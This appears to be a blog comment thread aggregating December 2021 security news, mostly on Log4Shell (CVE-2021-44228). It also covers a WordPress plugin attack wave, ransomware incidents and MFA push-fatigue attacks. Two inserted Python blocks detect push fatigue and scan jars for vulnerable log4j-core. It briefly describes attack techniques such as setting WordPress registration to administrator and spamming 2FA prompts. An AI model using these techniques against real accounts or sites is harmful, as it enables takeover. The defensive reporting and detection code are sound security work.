You might have heard of a Remote code execution (RCE) vulnerability in
log4j 2.x, that allows an attacker to execute arbitrary code by
controlling the contents of a single logged message. While
vulnerabilities are reported now and then, this vulnerability is totally
unheard of in its severity.
As for logback, while logback claims to be the successor to log4j 1.x,
logback is unrelated to log4j 2.x. It does not share code nor
vulnerabilities with log4j 2.x. More specifically, logback does not
suffer from the aforementioned RCE vulnerability in any shape or form.
Unfortunately, the vulnerability exists under SLF4J API when log4j 2.x
is used as the back-end implementation. Given the severity of this
issue, we encourage you to consider logback as the preferred back-end
for SLF4J API.
Also note that logback performs significantly better than log4j 2.x.
Tomi Engdahl says:
1.6 Million WordPress Sites Under Cyberattack From Over 16,000 IP Addresses
https://thehackernews.com/2021/12/16-million-wordpress-sites-under.html
As many as 1.6 million WordPress sites have been targeted by an active large-scale attack campaign originating from 16,000 IP addresses by exploiting weaknesses in four plugins and 15 Epsilon Framework themes.
WordPress security company Wordfence, which disclosed details of the attacks, said Thursday it had detected and blocked more than 13.7 million attacks aimed at the plugins and themes in a period of 36 hours with the goal of taking over the websites and carrying out malicious actions.
The plugins in question are Kiwi Social Share (<= 2.0.10), WordPress Automatic (<= 3.53.2), Pinterest Automatic (<= 4.14.3), and PublishPress Capabilities (<= 2.3), some of which have been patched dating all the way back to November 2018.
Most of the attacks observed by Wordfence involve the adversary updating the "users_can_register" (i.e., anyone can register) option to enabled and setting the "default_role" setting (i.e., the default role of users who register at the blog) to administrator, thereby allowing an adversary to register on the vulnerable sites as a privileged user and seize control.
Tomi Engdahl says:
The most Googled term this weekend is:
“log4j v2.15.”
RIP WEEKEND
Tomi Engdahl says:
Hackers penetrate and ravage delicate public and privately owned computer systems, infecting them with viruses, and stealing materials for their own ends. These people, they are terrorists. -Agent Gill
Brazil’s health ministry website hacked, vaccination information stolen and deleted
https://www.abc.net.au/news/2021-12-11/brazils-national-vaccination-program-hacked-/100692952
Brazil’s health ministry says its website has been hacked, taking down several systems, including one with information about the national immunisation program and another used to issue digital vaccination certificates.
Key points:
The alleged hackers call themselves Lapsus$ Group
Deputy Health Minister Rodrigo Cruz says it is too early to say if the data can be recovered
Quarantine requirements for unvaccinated travellers have been postponed
The government put off for a week implementing new health requirements for travellers arriving in Brazil due to the attack.
“The health ministry reports that in the early hours of Friday it suffered an incident that temporarily compromised some of its systems … which are currently unavailable,” it said in a statement on Friday.
Police said they were investigating the attack.
The alleged hackers, calling themselves Lapsus$ Group posted a message on the website saying that internal data had been copied and deleted.
“Contact us if you want the data back,” it said, in an apparent ransomware attack.
User data in the ConectSUS app that provides Brazilians with vaccination certificates had disappeared.
The ministry said it was working to restore its systems.
Under measures decided on Tuesday after President Jair Bolsonaro opposed the use of a vaccine passport, unvaccinated travellers arriving in Brazil will have to quarantine for five days and be tested for COVID-19.
The requirement was due to start on Saturday, but the government said that would be postponed for a week as vaccination data was not accessible online following the attack.
Tomi Engdahl says:
The vulnerability in the Log4j component is under active exploitation – update immediately!
https://www.kyberturvallisuuskeskus.fi/fi/varoitus_5/2021
Security researchers discovered the Log4shell zero-day vulnerability (CVE-2021-44228) in the Apache Java logging library Log4j.
The vulnerability allows an attacker to execute commands remotely on the server. According to our information, the vulnerability is also being actively exploited against Finnish organisations.
Based on public information, the vulnerability has also affected a large share of services on the internet. We will update the Tietoturva Nyt! publication as more information about vulnerable applications is released. It is strongly recommended to update Apache Log4j as soon as possible to version log4j-2.15.0-rc2. An ordinary user cannot take any action to fix the vulnerability; that is expected from administrators.
Tomi Engdahl says:
TECHNICAL: RCE in log4j, Log4Shell, or how things can get bad quickly
https://isc.sans.edu/diary/rss/28120
If you have been following developments on Twitter and various other security sources, by now you have undoubtedly heard about the latest vulnerability in the very popular Apache log4j library. log4j is a very popular logging package for Java. It is very powerful and flexible and, even from my own experience, is used in almost every Java application that I have ever encountered. No wonder, it allows you to just create an instance of the log4j class and then easily use it for logging, based on provided configuration parameters (typically set in the log4j.properties file). Yesterday a PoC for a Remote Code Execution vulnerability in log4j was published. The exploit is actually unbelievably simple which makes it very, very scary at the same time. The vulnerability is in the JNDI lookup feature of the log4j library. While the background around this is very complex, exploitation actually is not (as you will see below in a couple of redacted screenshots). More information:
https://nakedsecurity.sophos.com/2021/12/10/log4shell-java-vulnerability-how-to-safeguard-your-servers/
Tomi Engdahl says:
OVERVIEW: The Internet Is on Fire
https://www.wired.com/story/log4j-flaw-hacking-internet/
A vulnerability in the Log4j logging framework has security teams scrambling to put in a fix. A vulnerability in a widely used logging library has become a full-blown security meltdown, affecting digital systems across the internet. Hackers are already attempting to exploit it, but even as fixes emerge, researchers warn that the flaw could have serious repercussions worldwide. The problem lies in Log4j, a ubiquitous, open source Apache logging framework that developers use to keep a record of activity within an application. Security responders are scrambling to patch the bug, which can be easily exploited to take control of vulnerable systems remotely. At the same time, hackers are actively scanning the internet for affected systems.
Some have already developed tools that automatically attempt to exploit the bug, as well as worms that can spread independently from one vulnerable system to another under the right conditions.
AFFECTED SERVICES: The Internet’s biggest players are all affected by critical Log4Shell 0-day https://arstechnica.com/information-technology/2021/12/the-critical-log4shell-zero-day-affects-a-whos-who-of-big-cloud-services/
The list of services with Internet-facing infrastructure that is vulnerable to a critical zero-day vulnerability in the open source Log4j logging utility is immense and reads like a who’s who of the biggest names on the Internet, including Apple, Amazon, Cloudflare, Steam, Tesla, Twitter, and Baidu. The vulnerability, now going by the name Log4Shell, came to light on Thursday afternoon, when several Minecraft services and news sites warned of actively circulating attack code that exploited the vulnerability to execute malicious code on servers and clients running the world’s bestselling game. Soon, it became clear that Minecraft was only one of likely thousands of big-name services that can be felled by similar attacks.
Tomi Engdahl says:
Russian hackers bypass 2FA by annoying victims with repeated push notifications https://therecord.media/russian-hackers-bypass-2fa-by-annoying-victims-with-repeated-push-notifications/
Nobelium, the Russian cyber-espionage group that has orchestrated the SolarWinds 2020 supply chain attack, has continued to carry out new attacks throughout 2021, and according to security firm Mandiant, has been using a clever trick to bypass two-factor authentication in order to access some of its targets’ accounts. The technique, detailed in a report published on Monday, involves abusing the push notification feature of some online accounts. 2FA (two-factor authentication) or MFA (multi-factor authentication) push notifications are typically used as an alternative to receiving one-time codes via SMS or email, and they take the form of a popup that appears on a smartphone. When a user logs into an account with valid credentials, a push notification is shown on their smartphone, with details about the type and IP address of the device trying to access the account and asking for permission to allow the operation to go through. On Monday, Mandiant researchers said they’d investigated several incidents where Nobelium members gained access to a user’s valid login credentials, and they repeatedly attempted to log into the account, triggering repeated 2FA push notifications on the victim’s device until the target eventually accepted the request.
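The push-notification trick described above leaves a recognisable trace in authentication logs: a burst of unanswered or denied MFA prompts for one account, followed by an approval. The detection below is an added example (not code from The Record or Mandiant); the key=value log format and the sample lines are constructed assumptions, not any real identity provider's schema.

```python
"""Added example, not code from The Record or Mandiant: detect the MFA
push-fatigue pattern described above (repeated push prompts to one account in
a short window, ending in an approval) over constructed auth-log lines."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log; the key=value format is an assumption, not any
# real identity provider's schema.
SAMPLE_LOG = """\
2021-12-06T02:01:10Z user=alice event=mfa_push result=denied src=203.0.113.7
2021-12-06T02:01:40Z user=alice event=mfa_push result=timeout src=203.0.113.7
2021-12-06T02:02:15Z user=alice event=mfa_push result=denied src=203.0.113.7
2021-12-06T02:03:00Z user=alice event=mfa_push result=denied src=203.0.113.7
2021-12-06T02:06:05Z user=alice event=mfa_push result=approved src=203.0.113.7
2021-12-06T08:30:00Z user=carol event=mfa_push result=timeout src=192.0.2.9
2021-12-06T08:30:45Z user=carol event=mfa_push result=approved src=192.0.2.9
2021-12-06T09:15:00Z user=bob event=login result=success src=198.51.100.2
2021-12-06T09:15:02Z user=bob event=mfa_push result=approved src=198.51.100.2
"""


def parse_line(line):
    """'<ts> k=v k=v ...' -> dict with a datetime under 'ts'."""
    ts, *pairs = line.split()
    fields = dict(p.split("=", 1) for p in pairs)
    fields["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return fields


def detect_push_fatigue(lines, window=timedelta(minutes=10), threshold=3):
    """Two alert kinds per user: 'in_progress' when `threshold` unapproved
    prompts land inside `window` (the account is being hammered), and
    'accepted' when an approval follows such a burst (the outcome the
    Mandiant report describes)."""
    pending = defaultdict(deque)   # user -> timestamps of denied/timed-out prompts
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = parse_line(raw)
        if ev.get("event") != "mfa_push":
            continue
        q = pending[ev["user"]]
        while q and ev["ts"] - q[0] > window:   # drop prompts outside the window
            q.popleft()
        if ev["result"] in ("denied", "timeout"):
            q.append(ev["ts"])
            if len(q) == threshold:            # fire once, as the burst starts
                alerts.append({"kind": "in_progress", "user": ev["user"],
                               "unapproved_prompts": len(q),
                               "src": ev.get("src"), "at": ev["ts"]})
        elif ev["result"] == "approved":
            if len(q) >= threshold:
                alerts.append({"kind": "accepted", "user": ev["user"],
                               "unapproved_prompts": len(q),
                               "src": ev.get("src"), "at": ev["ts"]})
            q.clear()   # one mistap followed by an approval is not an alert
    return alerts


if __name__ == "__main__":
    for alert in detect_push_fatigue(SAMPLE_LOG.splitlines()):
        print(alert)
```

Tune `window` and `threshold` to the prompt expiry of the MFA product in use; a legitimate user rarely produces more than one or two unanswered prompts in a row.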
Tomi Engdahl says:
Massive attack against 1.6 million WordPress sites underway https://www.bleepingcomputer.com/news/security/massive-attack-against-16-million-wordpress-sites-underway/
Wordfence analysts report having detected a massive wave of attacks in the last couple of days, originating from 16,000 IPs and targeting over 1.6 million WordPress sites. The threat actors target four WordPress plugins and fifteen Epsilon Framework themes, one of which has no available patch. Some of the targeted plugins were patched all the way back in 2018, while others had their vulnerabilities addressed as recently as this week.
Tomi Engdahl says:
Authority warns of a scam spreading on social media: messages like these are a sign that someone is trying to hijack your account https://www.is.fi/digitoday/tietoturva/art-2000008467009.html
The National Cyber Security Centre of the Finnish Transport and Communications Agency Traficom warns that Finnish users' accounts on online services are being targeted for hijacking. A previously seen attack campaign is continuing. For the target, the attack usually appears as a friend making contact on social media, typically on Facebook Messenger or Instagram, and asking for a phone number. The stated reason is often that the friend wants to enter you into a competition. The request is followed by a text message claimed to be a participation code for the competition, and the recipient is asked to pass the code on. The arrival of this message is a sign that someone is trying to gain access to your account.
Tomi Engdahl says:
Log4j2 Vulnerability “Log4Shell” (CVE-2021-44228) https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers. According to public sources, Chen Zhaojun of Alibaba officially reported a Log4j2 remote code execution (RCE) vulnerability to Apache on Nov. 24, 2021. This critical vulnerability, subsequently tracked as CVE-2021-44228 (aka “Log4Shell”), impacts all versions of Log4j2 from 2.0-beta9 to 2.14.1.
Attempts to mitigate CVE-2021-44228 resulted in at least two fixes in release candidates of Log4j2 since November 2021. The first of these, on Nov. 29, 2021, included a partial fix by disabling message lookups for logging mechanism API functions. The second, released on Dec. 5, 2021, restricted the accesses and protocols that Log4j2 permits via Lightweight Directory Access Protocol (LDAP) and the Java Naming and Directory Interface (JNDI). However, industry sources suggest these fixes were incomplete, as the initial release candidate (Log4j2 2.15.0-rc1) addressing CVE-2021-44228 could be bypassed to achieve RCE. As of Dec. 10, 2021, version Log4j2 2.15.0-rc2 is recommended for use; however, guidance around this could change as more information is uncovere
Tomi Engdahl says:
Researchers release ‘vaccine’ for critical Log4Shell vulnerability https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/
Researchers from cybersecurity firm Cybereason have released a “vaccine” that can be used to remotely mitigate the critical ‘Log4Shell’ Apache Log4j code execution vulnerability running rampant through the Internet. Apache Log4j is a Java-based logging platform that can be used to analyze web server access logs or application logs. The software is heavily used in the enterprise, eCommerce platforms, and games, such as Minecraft, who rushed out a patched version earlier today. Early this morning, researchers released a proof-of-concept exploit for a zero-day remote code execution vulnerability in Apache Log4j tracked as CVE-2021-44228 and dubbed ‘Log4Shell.’ While Apache quickly released Log4j 2.15.0 to resolve the vulnerability, the vulnerability is trivial to exploit, and cybersecurity firms and researchers quickly saw attackers scan and attempt to compromise vulnerable devices. As threat actors can exploit this vulnerability by simply changing their web browser’s user agent and visiting a vulnerable site or searching for that string on a site, it quickly became a nightmare for the enterprise and some of the most popular websites on the web.
Log4j / Log4Shell Followup: What we see and how to defend (and how to access our data)
https://isc.sans.edu/diary/rss/28122
See the command-line options for mitigation.
Tomi Engdahl says:
If not possible, according to Apache advisory, other remediation steps are possible:
https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/
For Log4j 2.10 or higher: add -Dlog4j.formatMsgNoLookups=true as a command line option or add log4j.formatMsgNoLookups=true to the log4j2.component.properties file on the classpath to prevent lookups in log event messages. For Log4j 2.7 or higher: specify %m{nolookups} in the PatternLayout configuration to prevent lookups in log event messages. Remove the JndiLookup and JndiManager classes from the log4j-core jar. Note that removal of the JndiManager causes the JndiContextSelector and JMSAppender not to function.
Tomi Engdahl says:
Irish Health Service ransomware attack happened after one staffer opened malware-ridden email https://www.theregister.com/2021/12/10/ireland_health_conti_ransomware_attack_report/
Ireland’s Health Service Executive (HSE) was almost paralysed by ransomware after a single user opened a malicious file attached to a phishing email, a consultancy’s damning report has revealed. Issued today, the report from PWC (formerly known as PriceWaterhouseCoopers) said that the hugely harmful Conti ransomware infection was caused because of the simplest attack vector known to infosec: spam. PWC said, in the report’s executive summary: “The Malware infection was the result of the user of the Patient Zero Workstation clicking and opening a malicious Microsoft Excel file that was attached to a phishing email sent to the user on 16 March 2021.”
Tomi Engdahl says:
Volvo finally confirms “pontential” theft of R&D data https://therecord.media/volvo-finally-confirms-pontential-theft-of-rd-data/
Swedish automaker Volvo confirmed today a security breach and the theft of research and development (R&D) data from one of its file storage repositories. The company’s admission comes after it initially played down the incident, describing it in emails to The Record as a “potential cyberattack” and refusing to comment despite its data having been leaked online since November 30. But in a statement today, Volvo said the incident was more than potential and might be worse than it initially appeared. While the company did not elaborate on the details, Volvo said “there may be an impact on the company’s operation.” The company’s disclosure today is related to an entry on the dark web portal managed by Snatch, a hacking group known to steal data and engage in extortion attempts.
Tomi Engdahl says:
Phishing attacks use QR codes to steal banking credentials https://www.bleepingcomputer.com/news/security/phishing-attacks-use-qr-codes-to-steal-banking-credentials/
A new phishing campaign that targets German e-banking users has been underway in the last couple of weeks, involving QR codes in the credential-snatching process. The actors are using a range of tricks to bypass security solutions and convince their targets to open the messages and follow the instructions. The relevant report comes from researchers at Cofense, who sampled several of these messages and mapped the actors’ tactics in detail.
Tomi Engdahl says:
Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”. The vulnerability allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component. For more technical and mitigation information about the vulnerability, please read the Microsoft Security Response Center blog. The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers.
Tomi Engdahl says:
Log4Shell: Reconnaissance and post exploitation network detection https://research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/
Note: This blogpost will be live-updated with new information. NCC Group’s RIFT is intending to publish PCAPs of different exploitation methods in the near future (last updated December 12th at 19:15 UTC).
In the wake of the CVE-2021-44228 (a.k.a. Log4Shell) vulnerability publication, NCC Group’s RIFT immediately started investigating the vulnerability in order to improve detection and response capabilities mitigating the threat. This blog post is focussed on detection and threat hunting, although attack surface scanning and identification are also quintessential parts of a holistic response. Multiple references for prevention and mitigation can be found included at the end of this post. This blogpost provides Suricata network detection rules that can be used not only to detect exploitation attempts, but also indications of successful exploitation. In addition, a list of indicators of compromise (IOC’s) is provided. These IOC’s have been observed listening for incoming connections and are thus useful for threat hunting.
Inside the Log4j2 vulnerability (CVE-2021-44228) https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
Yesterday, December 9, 2021, a very serious vulnerability in the popular Java-based logging package Log4j was disclosed. This vulnerability allows an attacker to execute code on a remote server; a so-called Remote Code Execution (RCE). Because of the widespread use of Java and Log4j this is likely one of the most serious vulnerabilities on the Internet since both Heartbleed and ShellShock.
It is CVE-2021-44228 and affects version 2 of Log4j between versions 2.0-beta-9 and 2.14.1. It is patched in 2.15.0.
Tomi Engdahl says:
Critical vulnerability in Apache Log4j library
https://www.kaspersky.com/blog/log4shell-critical-vulnerability-in-apache-log4j/43124/
Researchers discovered a critical vulnerability in Apache Log4j library, which scores perfect 10 out of 10 in CVSS. Here’s how to protect.
Various information security news outlets reported on the discovery of critical vulnerability CVE-2021-44228 in the Apache Log4j library (CVSS severity level 10 out of 10). Millions of Java applications use this library to log error messages. To make matters worse, attackers are already actively exploiting this vulnerability. For this reason, the Apache Foundation recommends all developers to update the library to version 2.15.0, and if this is not possible, use one of the methods described on the Apache Log4j Security Vulnerabilities page.
Apache Log4j Security Vulnerabilities
https://logging.apache.org/log4j/2.x/security.html
Tomi Engdahl says:
Log4J “Log4Shell” Zero-Day Vulnerability: Impact and Fixes
https://fossa.com/blog/log4j-log4shell-zero-day-vulnerability-impact-fixes/
A critical vulnerability has been discovered in Apache Log4J, the popular Java open source logging library used in countless applications across the world. This vulnerability, tracked as CVE-2021-44228, has been assigned a CVSS score of 10, the maximum severity rating possible.
Log4J versions 2.15.0 and prior are subject to a remote code execution vulnerability.
As per Apache security releases, Apache Log4J2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From Log4J 2.15.0, this behavior has been disabled by default.
Impact of the Log4J Vulnerability
Logging untrusted or user-controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data provided in logged errors such as exception traces, authentication failures, and other unexpected vectors of user-controlled input.
Any Log4J version prior to v2.15.0 is affected by this specific issue.
The version 1 branch of Log4J is vulnerable to other RCE attacks and should be updated.
You can check for affected versions of Log4J by scanning your projects in FOSSA or manually checking for Log4J in projects pom.xml.
If possible, upgrade to Log4J version 2.15.0. If you are using Log4J v1, there is a migration guide available.
If upgrading is not possible, then ensure the -Dlog4j2.formatMsgNoLookups=true system property is set on both client- and server-side components.
https://logging.apache.org/log4j/2.x/manual/migration.html
Tomi Engdahl says:
DHS warns of critical flaw in widely used software
https://www.cnn.com/2021/12/11/politics/dhs-log4j-software-flaw-warning/index.html
(CNN) – The Department of Homeland Security’s top cyber official on Saturday urged government and private-sector organizations to address a critical flaw in widely used software that hackers were actively using to try to breach networks.
The vulnerability is in Java-based software known as “Log4j” that large organizations, including some of the world’s biggest tech firms, use to configure their applications.
Apple’s cloud computing service, security firm Cloudflare and one of the world’s most popular video games, Minecraft, are among the organizations that run Log4j, according to security researchers.
The vulnerability can offer a hacker a relatively easy way to access an organization’s computer server. From there, an attacker could devise other ways to access systems on an organization’s network.
The situation escalated before the weekend when a tool for exploiting the vulnerability was made public on GitHub, a software repository. That gave malicious hackers a potential roadmap for how to use the vulnerability to break into devices.
Cybersecurity researchers interviewed by CNN said it was unclear just how many devices on the internet are exposed to the vulnerability. But IT administrators around the world are on notice and preparing for a long weekend of responding to hacks.
Kevin Beaumont, a researcher who keeps a close eye on emerging software flaws, compared the conundrum that organizations are in with the software flaw to “lock[ing] the doors to your car, but then allow[ing] anybody to shout commands at Siri from outside the car to remotely drive it.”
“Log4j is buried deep inside products and [organizations], gonna be painful to fix,” Beaumont tweeted Friday.
Tomi Engdahl says:
Apache Log4j 2 vulnerability CVE-2021-44228
https://www.jenkins.io/blog/2021/12/10/log4j2-rce-CVE-2021-44228/
The Jenkins security team has confirmed that Log4j is not used in Jenkins core. Jenkins plugins may be using Log4j. You can identify
Tomi Engdahl says:
WD Updates SanDisk SecureAccess to Prevent Dictionary, Brute Force Attacks
https://www.securityweek.com/wd-updates-sandisk-secureaccess-prevent-dictionary-brute-force-attacks
Tomi Engdahl says:
Exploits Swirling for Major Security Defect in Apache Log4j
https://www.securityweek.com/exploits-swirling-major-security-defect-apache-log4j
Enterprise security response teams are bracing for a hectic weekend as public exploits — and in-the-wild attacks — circulate for a gaping code execution hole in the widely used Apache Log4j utility.
The remote code execution flaw is already being exploited to compromise Minecraft servers but, with such a massive attack surface at organizations around the world, experts warn that widespread exploitation is inevitable.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild and prompted the release of a high-priority patch.
The open-source Apache Foundation released an advisory to warn of the critical nature of the issue and notes that all versions from Log4j 2.0-beta9 to 2.14.1 are affected.
The raw details from the Apache advisory:
Description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>=2.10) this behavior can be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true” or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 protects against RCE by defaulting “com.sun.jndi.rmi.object.trustURLCodebase” and “com.sun.jndi.cosnaming.object.trustURLCodebase” to “false”.
Because the Log4j Java logging framework is deployed at internet infrastructure at thousands of major organizations (here’s a tracker of the expanding attack surface), there is growing urgency to stand up an emergency response organization to mitigate the issue.
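The advisory above gives two facts a defender can check on disk: log4j-core 2.0-beta9 through 2.14.1 is affected, and deleting JndiLookup.class from the jar (the zip -q -d command quoted above, also listed in the Check Point remediation steps earlier in this thread) is an accepted mitigation. The scanner below is an added example, not code from Apache, SecurityWeek or Check Point; it reads the Maven pom.properties that log4j-core ships with to get the version, recurses into nested jars, and builds its own constructed sample jars so it can be exercised offline.

```python
"""Added example (not code from Apache, SecurityWeek or Check Point): classify
log4j-core jars for CVE-2021-44228 using the advisory quoted above: versions
2.0-beta9 through 2.14.1 are affected, and deleting
org/apache/logging/log4j/core/lookup/JndiLookup.class mitigates. Nested jars
(fat jars, wars) are recursed into. Runtime-only mitigations such as
-Dlog4j2.formatMsgNoLookups=true cannot be seen from the jar itself."""
import io
import re
import sys
import zipfile
from pathlib import Path

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED = (2, 15, 0, 1)          # first release the quoted advisory calls fixed
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1); a pre-release such as '2.15.0-rc1' gets a
    trailing 0 so it sorts below the final release."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(-[\w.]+)?$", text.strip())
    if not m:
        return None
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1)


def status_for(version, jndi_present):
    v = parse_version(version) if version else None
    if v is not None and v >= FIXED:
        return "patched"
    if not jndi_present:
        return "mitigated"      # JndiLookup.class removed, as the advisory allows
    return "vulnerable" if v is not None else "vulnerable (version unknown)"


def classify_jar(data, name="<bytes>"):
    """Inspect one archive held in memory; returns one finding per log4j-core
    copy found at any nesting depth (shaded copies without pom.properties are
    still caught by the presence of JndiLookup.class)."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        jndi = JNDI_LOOKUP in names
        if version or jndi:
            findings.append({"jar": name, "version": version,
                             "jndi_lookup_present": jndi,
                             "status": status_for(version, jndi)})
        for inner in sorted(names):
            if inner.lower().endswith(ARCHIVE_EXT):
                findings.extend(classify_jar(zf.read(inner), f"{name}!{inner}"))
    return findings


def scan_directory(root):
    """Walk `root` and classify every archive found."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_EXT:
            findings.extend(classify_jar(path.read_bytes(), str(path)))
    return findings


def build_sample_jar(version, include_jndi=True):
    """Constructed stand-in for a log4j-core jar (placeholder bytes, not real
    classes) so the scanner can be exercised offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def build_fat_jar(inner_jar, inner_name="BOOT-INF/lib/log4j-core-2.13.3.jar"):
    """Constructed application jar that bundles `inner_jar` as a nested entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr(inner_name, inner_jar)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_directory(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{f['status']:28} {f['version'] or '?':12} {f['jar']}")
```

A "mitigated" result only proves the class is gone from that copy; a JVM that loads a different copy from another path, or from a container layer not on the scanned disk, still needs checking.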